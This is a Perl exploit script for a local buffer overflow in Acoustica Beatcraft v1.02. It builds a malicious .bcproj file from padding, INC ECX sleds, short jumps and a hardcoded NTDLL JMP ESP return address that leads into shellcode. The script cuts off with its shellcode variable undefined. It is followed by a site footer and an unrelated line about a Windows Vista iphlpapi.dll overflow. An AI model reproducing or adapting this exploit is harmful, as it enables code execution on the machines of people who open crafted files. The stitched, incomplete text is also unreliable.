#!/usr/bin/perl
#
# Acoustica Beatcraft (bcproj file) Local BOF Exploit
# Author: Koshi
#
# Date: 08-30-08 ( 0day )
# Application: Acoustica Beatcraft
# Version(s): v1.02 Build 19
# Site: http://acoustica.com/beatcraft/index.htm
# Tested On: Windows XP SP3 Fully Patched
#
# Acoustica Beatcraft contains a buffer prone to exploitation via an
# overly long string. The buffer contains the "title" of the "instruments"
# one can insert into a Beatcraft project. This exploit is a bit
# unstable in the fact that, to properly exploit it, one must open
# Beatcraft firstly, then proceed to open the exploit file from
# within Beatcraft. Simply double clicking the file will result
# in a simple DoS scenario. ( Hopefully I'll fix this soon )
# My guess as of now is we're not going to have it both ways.
#
# gr33tz: Rima my baby, str0ke, breaker_unit, mess'
#
my $led1 = "A"x110; # Sled ( \x41 INC ECX )
my $led2 = "A"x34; # Sled ( \x41 INC ECX )
my $buf1 = "A"x179; # Overflow
my $buff = "".
"$buf1". # Overflowage...
"$led1". # Slide on down to the jump
"\xeb\x07". # Jump NTDLL address
"\xed\x1e\x94\x7c". # NTDLL.DLL JMP ESP ( This may need to be changed to a
different JMP ESP )
"\xeb\x31". # Line it up right and land into the sled
"$led2". # Slip on down to the shellcode
"$shellcode"; # ..to the beat of a different drum.
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Microsoft Device IO Control wrapped by the iphlpapi.dll API shipping with Windows Vista 32 bit and 64 bit contains a possibly exploitable, buffer overflow corrupting kernel memory.